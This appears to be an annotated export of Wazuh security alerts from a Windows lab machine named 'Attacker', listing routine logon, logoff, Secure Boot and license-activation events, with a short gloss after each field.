data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:24.5733269Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43455 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 8984 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x1E7FC0D
Linked Logon ID: 0x1E7FD31
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x624
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Workstation Name: ATTACKER
Source Network Address: 127.0.0.1
Source Port: 0
Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x1e7fc0d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: User32 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.workstationName: ATTACKER No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x624 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipAddress: 127.0.0.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipPort: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x1e7fd31 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Software protection service scheduled successfully. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60642 Numeric ID of the detection rule that fired.
rule.firedtimes: 3 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533883.70051 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 16384 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:53:02.6493207Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2359 Incremental log record number – handy for timeline order.
data.win.system.processID: 9524 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Successfully scheduled Software Protection service for re-start at 2025-04-18T16:37:02Z. Reason: RulesEngine." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: 2025-04-18T16:37:02Z, RulesEngine No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533883.71629 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:24.5733520Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43456 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 8984 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 2
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: No
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x1E7FD31
Linked Logon ID: 0x1E7FC0D
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x624
Process Name: C:\Windows\System32\svchost.exe
Network Information:
Workstation Name: ATTACKER
Source Network Address: 127.0.0.1
Source Port: 0
Detailed Authentication Information:
Logon Process: User32
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x1e7fd31 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: User32 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.workstationName: ATTACKER No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x624 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\svchost.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipAddress: 127.0.0.1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.ipPort: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x1e7fc0d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Windows System error event Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 61102 Numeric ID of the detection rule that fired.
rule.firedtimes: 1 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_system', 'system_error'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
rule.gpg13: ['4.3'] No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
rule.gdpr: ['IV_35.7.d'] General Data Protection Regulation relevance.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533884.79347 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-TPM-WMI No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {7d5387b0-cbe0-11da-a94d-0800200c9a66} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1796 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:38:01.9174262Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2887 Incremental log record number – handy for timeline order.
data.win.system.processID: 12516 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 12400 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "The Secure Boot update failed to update a Secure Boot variable with error Secure Boot is not enabled on this machine.. For more information, please see https://go.microsoft.com/fwlink/?linkid=2169931" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hResult: -2147020471 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533884.80933 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4634 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12545 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:24.5862980Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43458 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 11484 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was logged off.
Subject:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x1E7FD31
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x1e7fd31 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533884.83399 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4634 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12545 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:24.6073282Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43459 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 11484 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was logged off.
Subject:
Security ID: S-1-5-21-1227732096-2714569048-1995468811-1002
Account Name: Attcker1
Account Domain: Attacker
Logon ID: 0x1E7FC0D
Logon Type: 2
This event is generated when a logon session is destroyed. It may be positively correlated with a logon event using the Logon ID value. Logon IDs are only unique between reboots on the same computer." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-21-1227732096-2714569048-1995468811-1002 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x1e7fc0d No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: License activation (slui.exe) failed. Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 60646 Numeric ID of the detection rule that fired.
rule.firedtimes: 2 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: False True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['windows', 'windows_application'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533884.85865 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-SPP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {E23B33B0-C8C9-472C-A5F9-F2BDFEA0F156} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventSourceName: Software Protection Platform Service No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 8198 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 0 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x80000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-20T01:40:51.9596326Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 2363 Incremental log record number – handy for timeline order.
data.win.system.processID: 4720 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Application No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: ERROR TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "License Activation (slui.exe) failed with the following error code:
hr=0x80004005
Command-line arguments:
RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.data: hr=0x80004005, RuleId=31e71c49-8da7-4a2f-ad92-45d98a1c79ba;Action=AutoActivate;AppId=55c92734-d682-4d71-983e-d6ec3f16059f;SkuId=4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c;NotificationInterval=1440;Trigger=TimerEvent No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745533884.88161 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-17T16:37:27.0631332Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43460 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 10856 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
